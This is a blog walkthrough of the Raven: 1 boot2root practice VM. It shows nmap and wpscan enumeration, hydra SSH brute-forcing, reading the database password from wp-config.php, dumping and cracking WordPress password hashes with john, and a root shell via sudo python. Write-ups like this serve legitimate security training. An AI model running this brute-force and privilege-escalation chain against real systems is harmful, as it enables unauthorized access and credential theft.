Introduction Raven: 1

Raven is a Beginner/Intermediate boot2root machine. There are four flags to find and two intended ways of getting root. Built with VMware and tested on Virtual Box. Set up to use NAT networking. If you wan to video so you can visit hereĀ Vulnerable Machine Solution.

Required skill for exploiting Raven: 1

  1. Ethical Hacking skills
  2. Basic mysql database
  3. Knowledge of Linux & it’s tools
  4. Social Engineering 
  5. Basic knowledge of python

Finally Let’s start the walkthrough of Raven: 1

[[email protected] ~]# arp-scan -l 

This will scan the network and show all the connected system in network as a result we can see in figure.

[[email protected] ~]# nmap -sS -sV 192.168.136.150
nmap result of Raven: 1

Above all the output of nmap command so let’s understand it.

first -sS is used for stealth scanning & again -sV is used for versions & targeted IP.  

As we can see in figure there are three ports available with there versions.
first port is 22 it for ssh service.
second port if 80 for website.
finally last port 111 is for rpcbind.
[[email protected] ~]# dirb http://192.168.136.150

The above command will scan almost all the possible url which are available as a result we can see in figure.

When I open this url http://192.168.136.150/wordpress probably I am sure this is running on wordpress but when I open it on my browser similarly i found this is running on wordpress as a result we can see in image.

Now i am using wpscan tool to enumerate the wordpress website.

[[email protected] ~]# wpscan --url http://192.168.136.150/wordpress --enumerate u

As a result i found two users are available so i decided to brute-forcing via hydra as a result i got the password of michael user instantly but not for another user.

[[email protected] ~]# hydra -L users -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.136.150

Almost we are entered in that machine with local user privileges.

[[email protected] ~]# ssh [email protected]

Password michael that we got previously we will logged in the targeted machine. Now we will find out the way to switch to root user.

Privileges escalation  of Raven: 1

After that I tried many way for privileges escalation but I could not got any thing then I thought to go to the document root where the wordpress data is available so i found a database file /var/www/html/wordpress/wp-config.php then i got the password of database with root user name.

user name:- root & password:- [email protected]

After login in mysql database we got hash of the another user steven then I cracked it using john as a result we can see below.

[email protected]:~$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 68
Server version: 5.5.60-0+deb8u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress |
+--------------------+
4 rows in set (0.04 sec)
mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.00 sec)
mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| 1 | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael | [email protected] | | 2018-08-12 22:49:12 | | 0 | michael |
| 2 | steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven | [email protected] | | 2018-08-12 23:31:16 | | 0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)
mysql>
[email protected]:~/raven1# john hash.txt 
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
pink84 (?)
1g 0:00:14:15 DONE 3/3 (2018-11-18 05:38) 0.001169g/s 4325p/s 4325c/s 4325C/s pink90..pingen
Use the "--show" option to display all of the cracked passwords reliably
Session completed
[email protected]:~/raven1#

Above all result will show the database result and the hash of that another user so we can cracked that using john now lets try to login as a another user steven.

[[email protected] ~]# ssh [email protected]
$ sudo -l
Matching Defaults entries for steven on raven:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User steven may run the following commands on raven:
(ALL) NOPASSWD: /usr/bin/python
$sudo /usr/bin/python
Python 2.7.9 (default, Jun 29 2016, 13:08:31)
[GCC 4.9.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
import os;
os.system("/bin/bash")
[email protected]:/home/steven# cd
[email protected]:~# cat flag4.txt

Finally we got the root and final flag. 

Here we have all the commands that we have used in exploit of Raven1.

[[email protected] ~]# arp-scan -l 

[[email protected] ~]# nmap -sS -sV 192.168.136.150

[[email protected] ~]# dirb http://192.168.136.150

[[email protected] ~]# wpscan --url http://192.168.136.150/wordpress --enumerate u

[[email protected] ~]# hydra -L users -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.136.150

[[email protected] ~]# ssh [email protected]

[email protected]:~$ nano /var/www/html/wordpress/wp-config.php

[email protected]:~$ mysql -u root -p

mysql> show databases;

mysql> show tables;

mysql> select * from wp_users;

[[email protected]:~]# john hash.txt

[[email protected] ~]# ssh [email protected]

$ sudo -l

$sudo /usr/bin/python

import os;

os.system("/bin/bash")

[email protected]:~# cd

[email protected]:~# cat flag4.txt

I hope you enjoy this if you have any query then you can ask me via comment and subscribe my YouTube channel Vulnerable Machine Solution.


1 Comment

Nitin Kumar · 20th November 2018 at 12:38 am

awesome…..and interesting……

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: